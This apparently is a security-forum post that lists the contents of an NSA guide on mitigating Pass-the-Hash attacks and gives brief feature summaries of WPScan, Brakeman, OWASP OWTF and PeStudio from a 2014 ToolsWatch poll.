1 Introduction
2 Background
3 Mitigations
3.1 Creating unique local account passwords
3.2 Denying local accounts from network logons
3.3 Restricting lateral movement on the network with firewall rules
4 Windows 8.1 Features
4.1 Deny local accounts from network logons in Windows 8.1
4.2 New Remote Desktop feature in Windows 8.1
4.3 Protecting LSASS
4.4 Clearing credentials
4.5 Protected Users group
5 Conclusion
6 References
Appendix A: Creating unique local passwords
Appendix B: Denying local administrators network access
Appendix C: Configuring Windows Firewall rules
Appendix D: Looking for possible PtH activity by examining Windows Event Logs
Appendix E: Summary of Local Accounts
Appendix F: Windows smartcard credentials

Download: https://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the-Hash.pdf
-
[h=3]WPScan[/h] WPScan is a black box WordPress vulnerability scanner.

Features
* Username enumeration (from author querystring and location header)
* Weak password cracking (multithreaded)
* Version enumeration (from generator meta tag and from client-side files)
* Vulnerability enumeration (based on version)
* Plugin enumeration (2220 most popular by default)
* Plugin vulnerability enumeration (based on plugin name)
* Plugin enumeration list generation
* Other misc WordPress checks (theme name, dir listing, …)

URL: http://wpscan.org
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
-
[h=3]Brakeman[/h] Brakeman is a security scanner for Ruby on Rails applications. Unlike many web security scanners, Brakeman looks at the source code of your application. This means you do not need to set up your whole application stack to use it. Once Brakeman scans the application code, it produces a report of all security issues it has found.

Features
* No Configuration Necessary
* Run It Anytime
* Better Coverage
* Best Practices
* Flexible Testing
* Speed

URL: http://brakemanscanner.org
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
-
[h=3]OWASP Offensive (Web) Testing Framework[/h] OWASP OWTF, the Offensive (Web) Testing Framework, is an OWASP+PTES-focused attempt to unite great tools and make pen testing more efficient, written mostly in Python. The purpose of this tool is to automate the manual, uncreative part of pen testing: for example, spending time trying to remember how to call "tool X", parsing results of "tool X" manually to feed "tool Y", and so on.

Features
* OWASP Testing Guide-oriented
* Report updated on the fly
* "Scumbag spidering"
* Resilience
* Easy to configure
* Easy to run
* Full control of what tests to run
* Easy to review transaction logs and plain text files with URLs
* Basic Google Hacking without (annoying) API key requirements via "blanket searches"
* Easy to extract data from the database to parse or pass to other tools

URL: https://www.owasp.org/index.php/OWASP_OWTF
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
-
[h=3]PeStudio[/h] PeStudio is a unique tool that performs static investigation of 32-bit and 64-bit executables. PeStudio is free for private, non-commercial use only. A malicious executable often attempts to hide its malicious behavior and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of PeStudio is to detect these anomalies, provide indicators, and score the trust of the executable being analyzed. Since the executable being analyzed is never started, you can inspect any unknown or malicious executable with no risk.

Features
* References
* Indicators
* Virus Detection
* Imports
* Resources
* Report
* Prompt
* Interface

URL: winitor
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers